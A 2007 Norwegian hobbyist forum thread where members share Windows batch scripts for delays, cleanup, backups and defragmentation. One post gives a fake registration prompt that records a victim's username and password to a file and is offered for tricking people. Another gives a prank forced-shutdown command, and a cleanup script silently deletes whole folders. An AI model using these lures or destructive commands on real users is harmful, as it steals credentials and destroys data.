Thor. Skrevet 22. juli 2007 Del Skrevet 22. juli 2007 Hei, drev tidligere med noobie scripting i CMD.Men ser jo nå at "sleep" commanden er tatt vekk, noen som vet om en command som har samme funsjon som denne i XP? 9118679[/snapback] joda Lenke til kommentar
kris98 Skrevet 22. juli 2007 Del Skrevet 22. juli 2007 Hei, drev tidligere med noobie scripting i CMD.Men ser jo nå at "sleep" commanden er tatt vekk, noen som vet om en command som har samme funsjon som denne i XP? 9118679[/snapback] joda 9118898[/snapback] Tror han mente å få programmet til å gå i sleep i X antall sek. Isåfall, så har du jo "ping 127.0.0.1 > nul". Pinger/pauser vel programmet i 1 sek eller noe slikt for hver linje med ping commanden. Lenke til kommentar
TobiasG Skrevet 23. juli 2007 Del Skrevet 23. juli 2007 (endret) Fant ut av det selv.. Bruker @ping ja, men du må sette på timer og sånt da.. Altså; @ping 127.0.0.1 -n 2 -w 1000 > nul Dette vil sette en timer på 2 sec Dette er også mye bedre hvis jeg skal pinge i 5 sec, slipper jeg å lime den inn 5 ganger ;D Tips til dere også og det er forskjellig hvordan det er med @ping uten etter- følgelse av commands.. så dere må huske det ;D Endret 23. juli 2007 av TobiasG Lenke til kommentar
kris98 Skrevet 23. juli 2007 Del Skrevet 23. juli 2007 Fant ut av det selv.. Bruker @ping ja, men du må sette på timer og sånt da.. Altså; @ping 127.0.0.1 -n 2 -w 1000 > nul Dette vil sette en timer på 2 sec Dette er også mye bedre hvis jeg skal pinge i 5 sec, slipper jeg å lime den inn 5 ganger ;D Tips til dere også og det er forskjellig hvordan det er med @ping uten etter- følgelse av commands.. så dere må huske det ;D 9128360[/snapback] Hehe, var borti den for litt siden, men husket den vel ikke Lenke til kommentar
TobiasG Skrevet 24. juli 2007 Del Skrevet 24. juli 2007 ^^ Hvis noen hadde orket å hjelpe meg med; https://www.diskusjon.no/index.php?showtopic=802141 cheers ;D Lenke til kommentar
ilpostino Skrevet 24. juli 2007 Del Skrevet 24. juli 2007 (endret) her er et script fra meg. det sletter absolutt ALT i de mappene man velger. dette er greit når en skal tømme temporære mapper. Klikk for å se/fjerne innholdet nedenfor @echo off :: *** Dette scriptet sletter alle filer og undermapper i de angitte mappende uten å spørre. *** :: Moderering og kjøring av modererte utgaver av dette scriptet skjer på eget ansvar. :: DETTE SLETTER ALLE MAPPER/FILER I C:\Documents and Settings\%username%\Lokale innstillinger\Temporary Internet Files\ cd "%SYSTEMDRIVE%\Documents and Settings\%username%\Lokale innstillinger\Temporary Internet Files\" del /s /q *.* for %%A in (dir . ) do (rmdir /q /s %%A) :: DETTE SLETTER ALLE MAPPER/FILER I C:\Documents and Settings\%username%\Lokale innstillinger\Temp\ cd "%SYSTEMDRIVE%\Documents and Settings\%username%\Lokale innstillinger\Temp\" del /s /q *.* for %%A in (dir . ) do (rmdir /q /s %%A) :: DETTE SLETTER ALLE MAPPER/FILER I C:\WINDOWS\Temp\ cd %WINDIR%\Temp\ del /s /q *.* for %%A in (dir . ) do (rmdir /q /s %%A) :: DETTE SLETTER ALLE MAPPER SOM INDEHOLDER OPPDATERINGER TIL WINDOWS. ()Mapper som begynner og avslutter med $) cd %WINDIR% FOR /F "tokens=*" %%G IN ('DIR /B /AD /S $*$') DO RMDIR /S /Q %%G :: Ta bort kommenteringen under for å se hva scriptet gjør. Hvis du vil få med deg alt setter du to kolon forran 1. linje i scriptet ::pause Endret 25. juli 2007 av ilpostino Lenke til kommentar
GeirGrusom Skrevet 24. juli 2007 Del Skrevet 24. juli 2007 Du burde endre temporære mapper til å bruke environment variables framfor hardkoding, som %WINDIR% etc. liste over alle sammen får du ved å skrive SET Lenke til kommentar
ilpostino Skrevet 24. juli 2007 Del Skrevet 24. juli 2007 Du burde endre temporære mapper til å bruke environment variables framfor hardkoding, som %WINDIR% etc. takk for tipset Lenke til kommentar
kris98 Skrevet 26. juli 2007 Del Skrevet 26. juli 2007 (endret) Kjeder med så her slenger jeg ut en.. @echo off TITLE Registration cls echo Please make a user: echo ------------------- echo Real name: set /p real= cls echo Username: set /p username= cls echo Password: set /p password= cls echo %real%'s Login: >> C:\fake.txt echo *************************************** >> C:\fake.txt echo Username: %username% >> C:\fake.txt echo Password: %password% >> C:\fake.txt echo --------------------------------------- >> C:\fake.txt echo >> C:\fake.txt echo >> C:\fake.txt echo >> C:\fake.txt cls msg * Errorcode 59 exit Lur noen til å tro det er et program eller spill av et slag. Hvis det er noen som enda vil gå på det :!: Endret 4. august 2007 av baronblod2003 Lenke til kommentar
tarcon Skrevet 2. august 2007 Del Skrevet 2. august 2007 Jeg har lagd meg ett lite spill med bat, men den koden er "litt" for lang til å legges ut her. Trykk her for å laste ned spillet! (ikkeno tull med fila.. 100% clean) Er ikke ferdig, men har lyst til å høre hva dere mener Lenke til kommentar
kris98 Skrevet 4. august 2007 Del Skrevet 4. august 2007 Jeg har lagd meg ett lite spill med bat, men den koden er "litt" for lang til å legges ut her.Trykk her for å laste ned spillet! (ikkeno tull med fila.. 100% clean) Er ikke ferdig, men har lyst til å høre hva dere mener 9195972[/snapback] Hohoho, ja den var tøff den Tok vel evigheter å lage Lenke til kommentar
tarcon Skrevet 4. august 2007 Del Skrevet 4. august 2007 Hohoho, ja den var tøff den Tok vel evigheter å lage 9206304[/snapback] Hehe.. joda, har tatt noen timer.. Men jeg syns den blir ganske morsom ^^ Lenke til kommentar
hernil Skrevet 11. august 2007 Del Skrevet 11. august 2007 liten kode jeg lagde i ferien, brukes delvis sammen med FFPortable. den tar backup av firefoxprofilen til %bakup% denne må endres til stredet dere ønsker å ha backupen, men det skjønte dere sikkert... Klikk for å se/fjerne innholdet nedenfor @echo off title Firefox profile backup set backup=E:\backup :topp del backup /Q cls taskkill /IM firefox.exe cls echo forbereder backup, backup kan ta noe tid... @ping.exe 127.0.0.1 -n 10 -w 1500 > nul cls echo Tar backup... xcopy "%appdata%\Mozilla\Firefox\Profiles\*" "backup" /E /H /Y IF %ERRORLEVEL% == 0 goto suksess IF %ERRORLEVEL% == 1 goto feil :feil cls echo backup misslyktes, vil du prøve på nytt? ja/nei set /p svar= if %svar% equ ja goto topp else goto feil :suksess cls start "" "%programfiles%\mozilla firefox\firefox.exe msg * backup er ferdig! goto end :feil msg * backup misslyktes! :end exit Lenke til kommentar
ilpostino Skrevet 14. august 2007 Del Skrevet 14. august 2007 jeg har flyttet et par poster som har omhandlet hjelp til et script. disse finnes her Lenke til kommentar
Skagen Skrevet 19. august 2007 Del Skrevet 19. august 2007 (endret) Her er et multi-defragmanteringsverktøy med GUI og greier som jeg laget for å demonstrere batch i Innføring i Batch. Siden jeg har laget GUI er programmet veldig langt, men går ut på at man setter opp en liste over diskstasjoner (etter bokstav) som vil defragmenteres på rekke og rad. For instruksjoner kan man starte batchen med "/?", "-?", "/h" eller "-h", f.eks slik: mdefrag -? Man kan også hoppe over å måtte velge alle stasjonene etter hverandre, og kan spesifisere stasjonene som parametre slik: mdefrag C E G Som vil defragmentere stasjonene C:, E: og G:. @ECHO OFF CLS SET OPT1= SET OPT2= SET OPT3= SET OPT4= SET OPT5= SET OPT6= SET OPT7= SET OPT8= SET OPT9= IF "%1"=="" GOTO :SETOPT1 IF "%1"=="/?" GOTO :HELP IF /I "%1"=="/h" GOTO :HELP IF "%1"=="-?" GOTO :HELP IF /I "%1"=="-h" GOTO :HELP IF NOT "%1"=="" SET OPT1=%1 IF NOT "%2"=="" SET OPT2=%2 IF NOT "%3"=="" SET OPT3=%3 IF NOT "%4"=="" SET OPT4=%4 IF NOT "%5"=="" SET OPT5=%5 IF NOT "%6"=="" SET OPT6=%6 IF NOT "%7"=="" SET OPT7=%7 IF NOT "%8"=="" SET OPT8=%8 IF NOT "%9"=="" SET OPT9=%9 GOTO :DEFRAG1 :HELP ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO If no input is specified, you will be prompted with a guided mode for ECHO selecting which disk(s) to defrag in sequense. ECHO. ECHO You can also specify drive letters seperated by space directly, ECHO as shown with this example: ECHO. ECHO Example of defragmenting drive C:, E: and G: in sequense: ECHO. ECHO MDEFRAG C E G ECHO. ECHO. GOTO :END :SETOPT1 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: None ECHO. ECHO. SET /P OPT1=Specify first drive in defrag sequense by letter only: IF /I "%OPT1%"=="X" GOTO :CANCEL IF "%OPT1%"=="" GOTO :NODEFRAG GOTO :SETOPT2 :SETOPT2 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO. ECHO. SET /P OPT2=Specify second drive in defrag sequense by letter only: IF /I "%OPT2%"=="X" GOTO :CANCEL IF "%OPT2%"=="" GOTO :DEFRAG1 GOTO :SETOPT3 :SETOPT3 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO. ECHO. SET /P OPT3=Specify third drive in defrag sequense by letter only: IF /I "%OPT3%"=="X" GOTO :CANCEL IF "%OPT3%"=="" GOTO :DEFRAG1 GOTO :SETOPT4 :SETOPT4 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO Disk 3: %OPT3%:/ ECHO. ECHO. SET /P OPT4=Specify forth drive in defrag sequense by letter only: IF /I "%OPT4%"=="X" GOTO :CANCEL IF "%OPT4%"=="" GOTO :DEFRAG1 GOTO :SETOPT5 :SETOPT5 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO Disk 3: %OPT3%:/ ECHO Disk 4: %OPT4%:/ ECHO. ECHO. SET /P OPT5=Specify fifth drive in defrag sequense by letter only: IF /I "%OPT5%"=="X" GOTO :CANCEL IF "%OPT5%"=="" GOTO :DEFRAG1 GOTO :SETOPT6 :SETOPT6 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO Disk 3: %OPT3%:/ ECHO Disk 4: %OPT4%:/ ECHO Disk 5: %OPT5%:/ ECHO. ECHO. SET /P OPT6=Specify sixth drive in defrag sequense by letter only: IF /I "%OPT6%"=="X" GOTO :CANCEL IF "%OPT6%"=="" GOTO :DEFRAG1 GOTO :SETOPT7 :SETOPT7 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO Disk 3: %OPT3%:/ ECHO Disk 4: %OPT4%:/ ECHO Disk 5: %OPT5%:/ ECHO Disk 6: %OPT6%:/ ECHO. ECHO. SET /P OPT7=Specify seventh drive in defrag sequense by letter only: IF /I "%OPT7%"=="X" GOTO :CANCEL IF "%OPT7%"=="" GOTO :DEFRAG1 GOTO :SETOPT8 :SETOPT8 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO Disk 3: %OPT3%:/ ECHO Disk 4: %OPT4%:/ ECHO Disk 5: %OPT5%:/ ECHO Disk 6: %OPT6%:/ ECHO Disk 7: %OPT7%:/ ECHO. ECHO. SET /P OPT8=Specify eighth drive in defrag sequense by letter only: IF /I "%OPT8%"=="X" GOTO :CANCEL IF "%OPT8%"=="" GOTO :DEFRAG1 GOTO :SETOPT9 :SETOPT9 CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Inputting X = Cancel/return to console. ECHO Pressing enter with blank/no input = execute/start defrag sequense. ECHO. ECHO Current defrag sequense: ECHO. ECHO Disk 1: %OPT1%:/ ECHO Disk 2: %OPT2%:/ ECHO Disk 3: %OPT3%:/ ECHO Disk 4: %OPT4%:/ ECHO Disk 5: %OPT5%:/ ECHO Disk 6: %OPT6%:/ ECHO Disk 7: %OPT7%:/ ECHO Disk 8: %OPT8%:/ ECHO. ECHO. SET /P OPT9=Specify last (nineth) drive in defrag sequense by letter only: IF /I "%OPT9%"=="X" GOTO :CANCEL GOTO :DEFRAG1 :DEFRAG1 IF "%OPT1%"=="" GOTO :NODEFRAG DEFRAG %OPT1%: GOTO :DEFRAG2 :DEFRAG2 IF "%OPT2%"=="" GOTO :END DEFRAG %OPT2%: GOTO :DEFRAG3 :DEFRAG3 IF "%OPT3%"=="" GOTO :END DEFRAG %OPT3%: GOTO :DEFRAG4 :DEFRAG4 IF "%OPT4%"=="" GOTO :END DEFRAG %OPT4%: GOTO :DEFRAG5 :DEFRAG5 IF "%OPT5%"=="" GOTO :END DEFRAG %OPT5%: GOTO :DEFRAG6 :DEFRAG6 IF "%OPT6%"=="" GOTO :END DEFRAG %OPT6%: GOTO :DEFRAG7 :DEFRAG7 IF "%OPT7%"=="" GOTO :END DEFRAG %OPT7%: GOTO :DEFRAG8 :DEFRAG8 IF "%OPT8%"=="" GOTO :END DEFRAG %OPT8%: GOTO :DEFRAG9 :DEFRAG9 IF "%OPT9%"=="" GOTO :END DEFRAG %OPT9%: GOTO :END :CANCEL CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Operation aborted: Canceled by user. ECHO. ECHO. GOTO :END :NODEFRAG CLS ECHO. ECHO MDEFRAG - Multi-Defrag tool by skag1 ECHO _____________________________________________________________________ ECHO. ECHO. ECHO Error: No drive letter(s) specified: No disk(s) to defrag. ECHO. ECHO. GOTO :END :END Endret 19. august 2007 av skag1 Lenke til kommentar
ilpostino Skrevet 19. august 2007 Del Skrevet 19. august 2007 *snip* Jeg har laget en mye enklere utgave enn dette scriptet. når jeg har brukt denne kommandoen for å dfragmentere synes jeg det har tatt uanstendig lang tid å defragmentere disken. Lenke til kommentar
Skagen Skrevet 19. august 2007 Del Skrevet 19. august 2007 (endret) Batchen har absolutt ingen innflytelse på hvordan defrag.exe håndterer defragmenteringen, med mindre det er forskjell på om kommandoen startes fra batch eller vanlig kommando, noe jeg tviler sterkt på. Kan det være at det går kjappere fordi du alt har defragmentert med min batch, som betyr at disken mer eller mindre var ferdig/fullstendig defragmentert når du prøvde uten batchen min? Endret 19. august 2007 av skag1 Lenke til kommentar
ilpostino Skrevet 19. august 2007 Del Skrevet 19. august 2007 jeg har ikke prøvd med din bact. jeg lagde en scheduled task (ved hjelp av en bat-fil) som starter en bat-fil. denne filen har kommandoen "defrag c" og dette har tatt 12 timer på en 80 gb disk. da avbrøt jeg detsiden det hadde tatt så lang tid. Lenke til kommentar
silentstorm Skrevet 21. august 2007 Del Skrevet 21. august 2007 har et lite et her, shutdown -r -f -t 20 -c "datamaskinen beklager denne meldingen, det er forde du at du har motatt et morroscript, for at dette skal forsvinne må datamaskinen startes på nytt 100 ganger" Lenke til kommentar
eiden84 Skrevet 21. august 2007 Del Skrevet 21. august 2007 ...som kan enkelt avbrytes ved å skrive shutdown -a Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå